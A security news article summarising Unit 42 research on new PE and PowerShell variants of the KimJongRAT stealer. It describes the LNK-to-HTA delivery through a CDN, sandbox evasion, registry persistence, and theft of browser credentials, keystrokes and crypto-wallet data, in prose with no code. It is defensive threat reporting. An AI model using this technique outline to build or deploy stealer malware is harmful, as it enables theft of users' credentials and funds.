KimJongRAT Returns: New PE & PowerShell Variants Steal Crypto and Browser Data via CDNs

Unit 42 has uncovered two newly evolved variants of the KimJongRAT malware, one using traditional PE (Portable Executable) files and the other employing PowerShell-based scripts to infiltrate systems, steal data, and exfiltrate sensitive browser, email, and cryptocurrency wallet information.

Originally documented in 2013 and again in 2019, KimJongRAT has resurfaced with heightened stealth and advanced multistage delivery mechanisms that exploit legitimate content delivery networks (CDNs) to obscure its malicious payloads. As Unit 42 researchers emphasize, these latest iterations mark “a clear and ongoing threat,” showcasing how threat actors continue to enhance their toolkits.

The infection chain for both variants begins similarly: users are tricked into opening a Windows shortcut (LNK) file—often disguised as official documents which downloads an HTA (HTML Application) file from a CDN subdomain at cdn.glitch[.]global.

In the PE variant, this HTA drops a decoy PDF, a loader (sys.dll), and a text file with URLs for additional payloads. The PowerShell variant follows a similar path but replaces the loader with PowerShell scripts and ZIP archives containing obfuscated stealer and keylogger modules.

The PE variant is methodically crafted:

1. The HTA file drops a Base64-decoded DLL, which then:
2. Checks for sandbox environments, ensuring it only runs in real systems.
3. Downloads additional encrypted components, reflectively loads the stealer (net64.log), and eventually executes a powerful orchestrator (main64.log).

This orchestrator is capable of:

• Uploading stolen files and clipboard data via HTTP POST methods
• Receiving backdoor commands via GET requests
• Searching for sensitive document formats, including .hwp, .pdf, .docx, and .zip
• Exfiltrating browser credentials, FTP/email client data, and keylogs

Unit 42 notes that the malware’s orchestration capabilities are substantial, with the orchestrator employing multiple threads for keylogging, clipboard monitoring, and persistent data theft.

“The network communication is implemented in an infinite loop that uploads collected data and requests commands from the C2 server,” the researchers explain.

In contrast, the PowerShell variant is more focused. It deploys its stealer and keylogger via embedded scripts in a ZIP archive. Notably, it implements comprehensive surveillance of browser data, particularly for cryptocurrency wallet extensions.

According to Unit 42, “this new analysis reveals the PowerShell variant’s special focus on cryptocurrency,” identifying and targeting browser extensions for MetaMask, Trust Wallet, TronLink, Exodus Web3 Wallet, and over 30 other crypto wallets.

The stealer achieves persistence by adding a Windows registry entry (WindowsSecurityCheck) and continuously scans for:

• Cookies
• Saved login credentials
• Installed extensions and browser activity
• Cryptocurrency wallet data
• Recently accessed documents and archive files

Unit 42’s forensic breakdown reveals that the stealer even halts browser processes to safely duplicate sensitive files, encrypts them, and sends them to the attacker’s command-and-control (C2) server using scheduled operations.

Both variants share several advanced traits:

• Abuse of trusted CDNs for payload delivery
• Obfuscation via Base64 and XOR encryption
• Multistage loaders that segment execution to evade detection
• Use of legitimate tools like certutil.exe, rundll32.exe, and mshta.exe

Perhaps most striking is the adaptability of KimJongRAT, evolving from a 2019 campaign tied to Operation Giant Baby and now re-emerging with modernized infrastructure and a growing emphasis on cryptocurrency theft.

Related Posts:

• Goffloader: In-Memory Execution, No Disk Required
• Orchestrator Remote Code Execution Vulnerability in Puppet Enterprise
• Sophisticated Phishing Campaign Abuses Webflow CDN to Steal Credit Card Data
• Exploiting CDN Integrations: A WAF Bypass Threatening Global Web Applications